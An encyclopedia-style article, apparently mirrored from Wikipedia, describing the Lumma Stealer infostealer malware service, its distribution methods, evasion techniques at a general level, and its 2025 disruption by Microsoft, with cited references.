Lumma Stealer

Last updated
Lumma Stealer
AliasLummaC2
Authors"Shamel" [1]
Technical details
Written in C++, ASM

Lumma Stealer is an infostealer malware as a service program developed for Microsoft Windows.

Contents

Technical overview

Lumma Stealer is distributed by affiliates via a number of campaigns including phishing emails, malicious advertisements posing as legitimate downloads, and compromised websites. It is frequently associated with fake CAPTCHA pages, which prompt the user to paste a command into the run box. [2] It steals data from a number of programs including web browsers, crypto wallets and chat applications, as well as user files. [3] The exfiltrated data is sent to a number of hardcoded control servers, falling back to Telegram, Dropbox and Steam if the servers are unreachable. [4]

Lumma Stealer employs advanced obfuscation techniques, and uses process hollowing to impersonate legitimate programs for the purposes of evading detection. It delays detonation until a sufficent amount of human-like activity has occurred. [5] Instead of using WinAPI, it performs direct syscalls. [6]

History

Lumma is believed to have first originated on cybercrime forums in 2022. [7]

From March to May 2025, Microsoft identified 394,000 computers that were infected with Lumma. [8] In 2025, Lumma was the second most common sample uploaded to ANY.RUN, and the third on MalwareBazaar. [9] [10] In May 2025, Microsoft announced the seizure of 2,300 domains associated with Lumma through a vulnerability. [11] While Lumma has continued their operation, it is believed that this may have damaged their reputation. [12]

References

  1. "The Rise of MaaS & Lumma Info Stealer". www.darktrace.com. Retrieved 2025-07-11.
  2. "Behind the CAPTCHA: A Clever Gateway of Malware".
  3. "Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer". Microsoft Security Blog. 2025-05-21. Retrieved 2025-07-11.
  4. Team, Cybereason Security Services. "Your Data Is Under New Lummanagement: The Rise of LummaStealer". www.cybereason.com. Retrieved 2025-07-11.
  5. akerr (2023-11-20). "Analyzing LummaC2 stealer's novel Anti-Sandbox technique: Leveraging trigonometry for human behavior detection". Outpost24. Retrieved 2025-07-11.
  6. "A Deep Dive Into Malicious Direct Syscall Detection". Palo Alto Networks Blog. 2024-02-13. Retrieved 2025-07-11.
  7. "Lumma Stealer Is Out… of Business!". Bitsight. Retrieved 2025-07-11.
  8. Masada, Steven (2025-05-21). "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool". Microsoft On the Issues. Retrieved 2025-07-11.
  9. "Malware Trends Tracker | ANY.RUN". Malware Trends Tracker | ANY.RUN. Retrieved 2025-07-11.
  10. "The Spamhaus Project". www.spamhaus.org. Retrieved 2025-07-11.
  11. Masada, Steven (2025-05-21). "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool". Microsoft On the Issues. Retrieved 2025-07-11.
  12. "LummaC2 Fractures as Acreed Malware Becomes Top Dog". www.darkreading.com. Retrieved 2025-07-11.
This page is based on this Wikipedia article
Text is available under the CC BY-SA 4.0 license; additional terms may apply.
Images, videos and audio are available under their respective licenses.